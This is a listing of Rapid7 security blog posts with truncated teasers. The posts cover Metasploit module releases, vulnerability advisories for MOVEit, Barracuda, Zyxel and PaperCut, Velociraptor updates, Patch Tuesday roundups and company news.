1723 matches found
Metasploit Weekly Wrap-Up
MOVEit It has been a busy few weeks in the security space; the MOVEit vulnerability filling our news feeds with dancing lemurs and a Barracuda vulnerability that has us all wondering how many shredders out there can handle a 1U appliance. Despite those very worthwhile distractions, Metasploit has...
OWASP TOP 10 API Security Risks: 2023!
The OWASP Top 10 API Security Risks 2023 has arrived! OWASP's API Top 10 is always a highly anticipated release and can be a key component of API security preparedness for the year. As we discussed in API Security Best Practices for a Changing Attack Surface, API usage continues to skyrocket. As ...
Detect and Prioritize Identity-Related Cloud Risk with InsightCloudSec
In modern cloud environments, roles and permissions are assigned not just to human users, but to machines, resources and services, as well. The massive scale of cloud environments leads to teams potentially managing millions of distinct identities. As a result, security teams often struggle to...
CVE-2023-2868: Total Compromise of Physical Barracuda ESG Appliances
Rapid7 incident response teams are investigating exploitation of physical Barracuda Networks Email Security Gateway ESG appliances dating back to at least November 2022. As of June 6, 2023, as part of an ongoing product incident response, Barracuda is urging ESG customers to immediately...
Velociraptor 0.6.9 Release: Digging Even Deeper with SMB Support, Azure Storage and Lockdown Server Mode
Carlos Canto contributed to this article. Rapid7 is very excited to announce version 0.6.9 of Velociraptor is now LIVE and available for download. Much of what went into this release was about expanding capabilities and improving workflows. We’ll now explore some of the interesting new features i...
Metasploit Weekly Wrap-Up
Cloud Fun With EC2 New ground was broken today with the addition of two PRs from community contributor sempervictus, also known as RageLtMan, who added the ability for Metasploit to establish sessions to EC2 instances using Amazon's SSM interface, which provides a public API to execute commands o...
This is Ceti Alpha Five!
Star Trek II: The Wrath of Khan demonstrating the very best and worst of cybersecurity in the 23rd Century For those new to the Sci-Fi game, Star Trek II: The Wrath of Khan is a 1982 science fiction film based on the 1966-69 television series Star Trek. In the film, Admiral James T. Kirk and the...
Metasploit Weekly Wrap-Up
AD CS certificate templates Our very own Spencer McIntyre has developed a new module that allows for creating, reading, updating and deleting certificate template objects from Active Directory. ESC4 Exploitation These changes notably enables the exploitation of the technique identified as ESC4...
Rapid7 Observed Exploitation of Critical MOVEit Transfer Vulnerability
Note: As of June 2, 2023, CVE-2023-34362 has been assigned to this vulnerability. On Friday, June 9, Progress Software released patches for a second vulnerability, CVE-2023-35036. On Thursday, June 15, a third vulnerability was announced and later assigned CVE-2023-35708. Progress has updates her...
Rapid7 Sales Director Devin Poulter On Building a Career as an Account Executive
Devin Poulter is a Sales Director with over 20 years of experience in the tech industry. Recently, we asked him a few questions to learn more about how he built his career, what it’s like to lead a team at Rapid7, and more. You’ve been in software sales for most of your career, what can you tell ...
Rapid7 Data Engineers Inspire Future Tech Talent at Summer Search Career Fest
We are thrilled to share some exciting news from our data engineering team at Rapid7. Earlier this month, our very own data engineers had the honor of being panelists at the technology panel organized by Summer Search, a fantastic organization that our CEO, Corey Thomas, is on the Leadership...
Widespread Exploitation of Zyxel Network Devices
Rapid7 is tracking reports of ongoing exploitation of CVE-2023-28771, a critical unauthenticated command injection vulnerability affecting multiple Zyxel networking devices. The vulnerability is present in the default configuration of vulnerable devices and is exploitable in the Wide Area Network...
Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session
Over the last year, two-thirds of the exploit modules added to Metasploit Framework have targeted command injection vulnerabilities CWE-94: Improper Control of Generation of Code. In the process of helping new and existing open-source contributors learn how to use Metasploit’s command stager...
Healthcare Orgs: Do You Need an Outsourced SOC?
Gartner predicts that 50% of organizations will partner with an external MDR Managed Detection and Response service by 2025 for around-the-clock monitoring. What determines where healthcare organizations fall on that 50/50 split over using an outsourced SOC? It usually comes down to their ability...
VeloCON 2023: Submissions Wanted!
Rapid7 is thrilled to announce that the 2nd annual VeloCON virtual summit will be held this September date TBD, with times oriented to the continental USA time zones. Once again, the conference will be online and completely free! VeloCON is a one-day event focused on the Velociraptor community...
Casting a Light on Shadow IT in Cloud Environments
What is Shadow IT? The term “Shadow IT” refers to the use of systems, devices, software, applications, and services without explicit IT approval. This typically occurs when employees adopt consumer products to increase productivity or just make their lives easier. This type of Shadow IT can be...
Metasploit Weekly Wrap-Up
Fetch Based Payloads: Making the Path from Command Injection to Metasploit Session Shorter This week we’re releasing Metasploit fetch payloads. Fetch payloads are command-based payloads that leverage network-enabled applications on remote hosts and different protocol servers to serve, download, a...
Introducing: ‘Saved Filters’ in InsightCloudSec
Last year, when we launched Layered Context in InsightCloudSec, we knew we had something great on our hands. Not just because we provided a single view for cloud security practitioners to see their full cloud risk posture though, if we do say so ourselves, that’s pretty sweet. No, we knew we had...
Rapid7 Recognized as a Strong Performer in The Forrester Wave™ for MDR, Q2 2023
Rapid7 recognized amongst the top MDR providers in the industry. As security teams try to do more with less, addressing the sprawling attack surface and monitoring the escalating threat and risk landscape, it inherently leaves them at a disadvantage. Rapid7 Managed Threat Complete empowers...
CVE-2023-27350: Ongoing Exploitation of PaperCut Remote Code Execution Vulnerability
CVE-2023-27350 is an unauthenticated remote code execution vulnerability in PaperCut MF/NG print management software that allows attackers to bypass authentication and execute arbitrary code as SYSTEM on vulnerable targets. A patch is available for this vulnerability and should be applied on an...
Metasploit Wrap-up
Chaining for the win 1: Pentaho Business Server This week, our very own jheysel-r7 added an exploit module that leverages two vulnerabilities in Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x. The module chains an authentication bypass...
[The Lost Bots] S03E03. The Rise of The Machines
!\The Lost Bots\ S03E03. The Rise of The Machineshttps://blog.rapid7.com/content/images/2023/05/CWfxAaUmZV248bvr4yKaK2.jpg Artificial Intelligence AI is both a profound topic and now, a practical one too: cybersecurity marketers in particular are loving the letters “A” an “I.” But exactly where a...
The Velociraptor 2023 Annual Community Survey
By Dr. Mike Cohen & Carlos Canto Velociraptor is an open-source project led and shaped by the community. Over the years, Velociraptor has become a real force in the field of DFIR, making it an obvious choice for many operational situations. Rapid7 is committed to continue making Velociraptor the...
Patch Tuesday - May 2023
A less crowded Patch Tuesday for May 2023: Microsoft is offering fixes for just 49 vulnerabilities this month. There are no fixes this month for printer drivers, DNS, or .NET, three components which have featured heavily in recent months. Three zero-day vulnerabilities are patched, alongside a...
Metasploit Weekly Wrap-Up
Throw another log file on the fire Our own Stephen Fewer authored a module targeting CVE-2023-26360 affecting ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier. The vulnerability allows multiple paths to code execution, but our module works by leveraging a...
AppDomain Manager Injection: New Techniques For Red Teams
AppDomain Manager Injection is a very versatile and useful technique for red team operators. This technique allows you to effectively turn any Microsoft.NET application on a Windows host into a lolbin Living Off the Land Binary by forcing the application to load a specially crafted .NET assembly,...
Cloud Security Strategies for Manufacturing
Protecting production while supporting growing cloud initiatives The manufacturing industry is in limbo as organizations shift to cloud services. Many organizations are transitioning services to the cloud, but the vast majority maintain hybrid network environments that lean heavily on on-prem...
Three Takeaways from the Gartner® Market Guide for Managed Detection and Response Services
Not all MDR services are created equal, and in order for organizations to find the right partner for their managed detection and response needs, Gartner® has published a Market Guide report offering key insights for businesses of all sizes. At Rapid7, we are proud to offer this complimentary repo...
Metasploit Weekly Wrap-Up
Scanner That Pulls Sensitive Information From Joomla Installations This week's Metasploit release includes a module for CVE-2023-23752 by h00die. Did you know about the improper API access vulnerability in Joomla installations, specifically Joomla versions between 4.0.0 and 4.2.7, inclusive? This...
New InsightCloudSec Compliance Pack: Implementing and Enforcing ISO 27001:2022
James Alaniz and Diamond Fair contributed to this article. We’ve been on quite a roll lately releasing new compliance packs, along with iterative updates to others that we’ve supported for a while now. We’re not done yet, either! In this article, we’ll discuss our newly released compliance pack f...
Using Rapid7 Insight Agent and InsightVM Scan Assistant in Tandem
Background Rapid7 Insight Agent and InsightVM Scan Assistant are executables that can be deployed to assist in understanding the vulnerabilities in your environment. Frequently there are questions around when and where you would deploy each, if you need both, what they actually monitor, etc. This...
Starting a Career in Tech? Learn How Rapid7’s Emerging Talent Programmes Foster Long-Term Success
Rapid7’s Emerging Talent Programmes pave the way for early career professionals to have a successful career in tech. In Belfast, we offer both an Apprentice Programme and a Placement Programme to support new talent coming into the tech field. The Apprentice Programme is designed for individuals...
4 Takeaways from the 2023 Gartner® Market Guide for CNAPP
In an ongoing effort to help security organizations gain greater visibility into risk, we're pleased to offer this complimentary Gartner research, and share our 4 Takeaways from the 2023 Gartner® Market Guide for CNAPP. This critical research can help security leaders take an in-depth look into...
Metasploit Weekly Wrap-Up
VMware Workspace ONE Access exploit chain A new module contributed by jheysel-r7 exploits two vulnerabilities in VMware Workspace ONE Access to attain Remote Code Execution as the horizon user. First being CVE-2022-22956, which is an authentication bypass and the second being a JDBC injection in...
3 Key Challenges to Clarity in Threat Intelligence: 2023 Forrester Consulting Total Economic Impact™ Study
Inundated with data It would have been really cool to combine those two words to make “inundata,” but it would have been disastrous for SEO purposes. It’s all meant to kick off a conversation about the state of security organizations with regard to threat intelligence. There are several key...
Automating Qakbot Detection at Scale With Velociraptor
In this blog, you will learn a practical methodology to extract configuration data from recent Qakbot samples. I will provide some background on Qakbot, then walk through decode themes in an easy to visualize manner. Additionally, I'll share a Velociraptor artifact to detect and automate the deco...
Metasploit Weekly Wrap-Up
Rocket Software UniRPC Exploits Ron Bowes submitted two exploit modules for vulnerabilities he discovered in the UniRPC server for Rocket Software’s UniData product. The first exploit module, exploit/linux/misc/unidataudadminauthbypass exploits an authentication bypass to ultimately gain remote...
Automating Qakbot decode at scale
This is a technical post covering practical methodology to extract configuration data from recent Qakbot samples. In this blog, I will provide some background on Qakbot, then walk through decode themes in an easy to visualize manner. I will then share a Velociraptor artifact to detect and automat...
Anarchy in the UK? Not Quite: A look at the cyber health of the FTSE 350
The attack surface of the United Kingdom's 350 largest publicly traded companies has—drum roll, please—improved. But it could be better. Those are the high level findings of the latest in Rapid7's looks at the cybersecurity health of companies tied to some of the globe's largest stock indices. Th...
Patch Tuesday - April 2023
Microsoft is offering fixes for 114 vulnerabilities for April 2023 Patch Tuesday. This month’s haul includes a single zero-day vulnerability, as well as seven critical Remote Code Execution RCE vulnerabilities. There is a strong focus on fixes for Windows OS this month. Zero-day vulnerability: CL...
7 Rapid Questions: Lindsey Searle
Welcome back to 7 Rapid Questions, our blog series where we ask passionate leaders at Rapid7 to give us an inside look at what it’s like to work on their team, and how they’re creating an impact every day. In this installment, we talk to Lindsey Searle, Senior Manager, Customer Advisors on how he...
Raptor Technologies Volunteer Management Client-Side Security Controls (FIXED)
Prior to Mar 18, 2023, due to a reliance on client-side controls, authorized users of Raptor Technologies Volunteer Management SaaS products could effectively enumerate authorized users, and could modify restricted and unrestricted fields in the accounts of other users associated with the same...
Rapid7 Podcast Explores Hybrid-First Workplace Learnings
As the world continues to navigate the post-pandemic shift in work environments, Rapid7 is operating on a hybrid-first approach that balances flexibility and productivity with collaboration and optimizing for customer success. In the spirit of cross-collaboration, the People Development and...
Metasploit Weekly Wrap-Up
The tide rolls in and out. The flood of new modules last week crested leaving ample time for documentation updates this week. The team and the community seem to have focused on getting those sweet sprinkles of information that help everyone understand Metasploit out to the world. Enhancements and...
[The Lost Bots] S03E02: Finding unknowns, even spy balloons
!\The Lost Bots\ S03E02: Finding unknowns, even spy balloonshttps://blog.rapid7.com/content/images/2023/04/The-Lost-Bots-logo-large.png When a balloon crossed through Canada and the United States, everyone lost their minds. The news was all-balloon, all-the-time. And the big, obvious, serious...
Using InsightVM Remediation Projects To Ensure Accountability
One benefit of InsightVM reporting is that it enables security teams to build accountability into remediation projects. There are a number of ways this can be accomplished and the approach you take will be dictated by your organization’s specific structure and needs. In this blog, we’ll look at t...
Metasploit Weekly Wrap-up
Windows 11 ADF WinSock Priv Esc The new windows/local/cve202321768afdlpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write...
What’s New in InsightVM and Nexpose: Q1 2023 in Review
In Q1, our team continued to focus on driving better customer outcomes with InsightVM and Nexpose by further improving efficiency and performance. While many of these updates are under the hood, you may have started to notice faster vulnerability checks available for the recent ETRs or an upgrade...
Velociraptor Version 0.6.8 Available Now
A New Client-Server Communication Protocol, VFS GUI, and More Performance Upgrades Make This The Fastest and Most Scalable Velociraptor Yet Rapid7 is excited to announce the release of version 0.6.8 of Velociraptor—an advanced, open-source digital forensics and incident response DFIR tool that...
Rapid7 Announces Partner of the Year Awards 2023 Winners
It’s with immense pleasure that we announce today the winners of the Rapid7 Partner of the Year Awards 2023. All our category winners have achieved exceptional growth—demonstrating their dedication to, and collaboration with, the Rapid7 Partner Program throughout the year. “We are incredibly...